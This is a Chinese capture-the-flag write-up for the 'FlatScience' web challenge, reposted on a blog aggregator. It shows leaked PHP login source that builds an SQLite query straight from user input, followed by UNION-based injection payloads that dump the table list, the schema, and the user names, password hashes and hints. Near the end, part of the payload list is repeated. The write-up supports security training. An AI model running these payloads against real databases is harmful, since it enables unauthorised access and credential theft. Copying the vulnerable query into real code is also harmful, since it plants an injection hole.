当前位置: 首页 > article >正文

攻防世界38-FlatScience-CTFWeb

攻防世界38-FlatScience-Web

点开这个here看到一堆pdf,感觉没用,扫描一下

image-20241112213147892

试试弱口令先

image-20241112213254645

源码里有:

好吧0.0

试试存不存在sql注入

根本没回显,转战login.php先

输入1’,发现sql注入

image-20241112215625192

image-20241112215405748

看到提示

访问后得源码

<?php
ob_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html>
<head>
<style>
blockquote { background: #eeeeee; }
h1 { border-bottom: solid black 2px; }
h2 { border-bottom: solid black 1px; }
.comment { color: darkgreen; }
</style>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Login</title>
</head>
<body>


<div align=right class=lastmod>
Last Modified: Fri Mar  31:33:7 UTC 1337
</div>

<h1>Login</h1>

Login Page, do not try to hax here plox!<br>


<form method="post">
  ID:<br>
  <input type="text" name="usr">
  <br>
  Password:<br> 
  <input type="text" name="pw">
  <br><br>
  <input type="submit" value="Submit">
</form>

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }

}

if(isset($_GET['debug']))
highlight_file('login.php');
?>
<!-- TODO: Remove ?debug-Parameter! -->




<hr noshade>
<address>Flux Horst (Flux dot Horst at rub dot flux)</address>
</body>

​ $db = new SQLite3(‘…/fancy.db’);提示是个sqlite注入

payload里注入

image-20241112221500703

返回在右上角

image-20241112221652101

usr=' union select 1,group_concat(tbl_name) from sqlite_master where type='table'--&pw= //查所有表
usr=' union select 1,group_concat(sql) from sqlite_master where tbl_name='Users'--&pw= //查表所有字段
//查所有内容
usr=' union select 1,group_concat(id) from Users--&pw=1
usr=' union select 1,group_concat(name) from Users--&pw=1
usr=' union select 1,group_concat(password) from Users--&pw=1
usr=' union select 1,group_concat(hint) from Users--&pw=

得到hint,下面做不动了

贴一个大佬的wp

oncat(password) from Users–&pw=1
usr=’ union select 1,group_concat(hint) from Users–&pw=


得到hint,下面做不动了

贴一个大佬的wp

[FlatScience XCTF web进阶区FlatScience详解-CSDN博客](https://blog.csdn.net/weixin_43693550/article/details/120241607?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-2-120241607-blog-112161044.235^v43^pc_blog_bottom_relevance_base4&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-2-120241607-blog-112161044.235^v43^pc_blog_bottom_relevance_base4&utm_relevant_index=5)

http://www.kler.cn/a/391236.html

相关文章:

  • 前端开发 -- 自动回复机器人【附完整源码】
  • 最新高性能多目标优化算法:多目标麋鹿优化算法(MOEHO)求解LRMOP1-LRMOP6及工程应用---盘式制动器设计,提供完整MATLAB代码
  • Vite内网ip访问,两种配置方式和修改端口号教程
  • 新建一个springboot项目
  • SLAM/数字图象处理基础
  • 【VScode】第三方GPT编程工具-CodeMoss安装教程
  • 【Linux】:进程信号(信号概念 信号处理 信号产生)
  • SpringBoot框架的企业资产管理自动化
  • Docker pull镜像故障分析
  • python遇到问题
  • Snort的配置与使用
  • 6 ARM-PEG-TMA可以作为有机合成中间体,参与合成各种复杂的有机化合物和聚合物
  • Leidenアルゴリズムの詳細解説:Pythonによるネットワーク分割の実装
  • Rust学习(三):rust基础Ⅱ
  • 【JAVA】正则表达式中的中括弧
  • 基于MATLAB刻度线表盘识别系统
  • 微擎框架php7.4使用phpexcel导出数据报错修复
  • 计算机毕业设计Python+大模型斗鱼直播可视化 直播预测 直播爬虫 直播数据分析 直播大数据 大数据毕业设计 机器学习 深度学习
  • 第3关-L0G3000
  • 【计算机网络】网卡NIC的工作内容包括哪些呢?
  • Unet++改进10:添加CPCA||通道先验卷积注意力机制
  • 喜报|超维机器人荣获昇腾AI创新大赛铜奖
  • C# 复制文件到指定文件夹
  • Redis 数据类型
  • 【python基础算法编程】
  • 软件设计师-法律法规与标准化